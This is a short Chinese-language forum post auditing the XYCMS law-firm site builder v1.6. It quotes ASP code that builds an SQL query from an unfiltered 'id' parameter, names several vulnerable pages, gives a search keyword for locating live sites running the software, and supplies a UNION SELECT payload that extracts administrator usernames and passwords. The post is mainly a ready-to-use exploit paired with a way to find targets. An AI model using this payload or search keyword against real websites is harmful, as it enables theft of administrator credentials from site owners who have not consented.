作者:Liuker
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
淫荡分割线
--------------------------------------------------------
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm
漏洞文件:shownews.asp
漏洞代码:7-13行
< % id = request.QueryString ( "id" ) set snews = server.createobject ( "adodb.recordset" ) exec = "select * from [news] where id=" & id snews. open exec , conn , 1 , 1 % > |
什么过滤都没有 直造成注入
注入点:http://127.0.0.1:99/shownews.asp?id=xx
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
关键字:律师 powered by xycms
exp: union select 1,admin,password,4,5,7 from admin_user
文章评论